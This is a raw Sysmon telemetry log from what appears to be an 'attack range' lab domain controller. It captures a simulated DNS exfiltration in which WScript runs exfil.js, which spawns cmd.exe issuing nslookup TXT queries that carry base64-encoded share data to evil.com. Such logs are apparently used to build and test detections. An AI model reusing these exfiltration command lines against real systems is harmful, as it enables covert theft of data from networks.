14:16:37.681{2E1864BB-17C5-629A-1A41-000000005F02}59566688C:\Windows\system32\conhost.exe{2E1864BB-17C5-629A-1B41-000000005F02}8108C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202056Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.666{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202055Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.666{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202054Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.666{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202053Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.666{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202052Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.666{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C5-629A-1B41-000000005F02}8108C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202051Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.666{2E1864BB-17C5-629A-1941-000000005F02}26166424C:\Windows\system32\cmd.exe{2E1864BB-17C5-629A-1B41-000000005F02}8108C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000202050Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.679{2E1864BB-17C5-629A-1B41-000000005F02}8108C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlw= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C5-629A-1941-000000005F02}2616C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlw= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlakis.tmp 2>&1 10341000x8000000000000000202049Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.650{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17C5-629A-1A41-000000005F02}5956C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202048Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.650{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C5-629A-1A41-000000005F02}5956C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202047Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.634{2E1864BB-17C5-629A-1A41-000000005F02}59566688C:\Windows\system32\conhost.exe{2E1864BB-17C5-629A-1941-000000005F02}2616C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202046Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.627{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C5-629A-1A41-000000005F02}5956C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202045Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.612{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202044Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.612{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202043Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.612{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202042Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.612{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202041Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.612{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C5-629A-1941-000000005F02}2616C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202040Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.612{2E1864BB-17A1-629A-783D-000000005F02}55524996C:\Windows\System32\WScript.exe{2E1864BB-17C5-629A-1941-000000005F02}2616C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000202039Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.619{2E1864BB-17C5-629A-1941-000000005F02}2616C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlw= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlakis.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000202038Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.612{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlwxtvg.tmpMD5=F6538327F98D74144BA52EAB59FD8171,SHA256=A568CE5C7493269BCFA80FC109B1A109EB505115BC218515B0E503F4B1DBE007,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000202037Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.549{2E1864BB-17C5-629A-1741-000000005F02}60364280C:\Windows\system32\conhost.exe{2E1864BB-17C5-629A-1841-000000005F02}5708C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202036Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.549{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202035Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.549{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202034Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.549{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202033Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.549{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202032Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.549{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C5-629A-1841-000000005F02}5708C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202031Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.549{2E1864BB-17C5-629A-1641-000000005F02}76483004C:\Windows\system32\cmd.exe{2E1864BB-17C5-629A-1841-000000005F02}5708C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000202030Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.551{2E1864BB-17C5-629A-1841-000000005F02}5708C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBDJA== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C5-629A-1641-000000005F02}7648C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBDJA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlwxtvg.tmp 2>&1 10341000x8000000000000000202029Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.512{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17C5-629A-1741-000000005F02}6036C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202028Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.512{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C5-629A-1741-000000005F02}6036C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202027Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.512{2E1864BB-17C5-629A-1741-000000005F02}60364280C:\Windows\system32\conhost.exe{2E1864BB-17C5-629A-1641-000000005F02}7648C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000202026Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.746{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52869- 354300x8000000000000000202025Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.746{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52868- 354300x8000000000000000202024Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.745{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52867- 10341000x8000000000000000202023Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 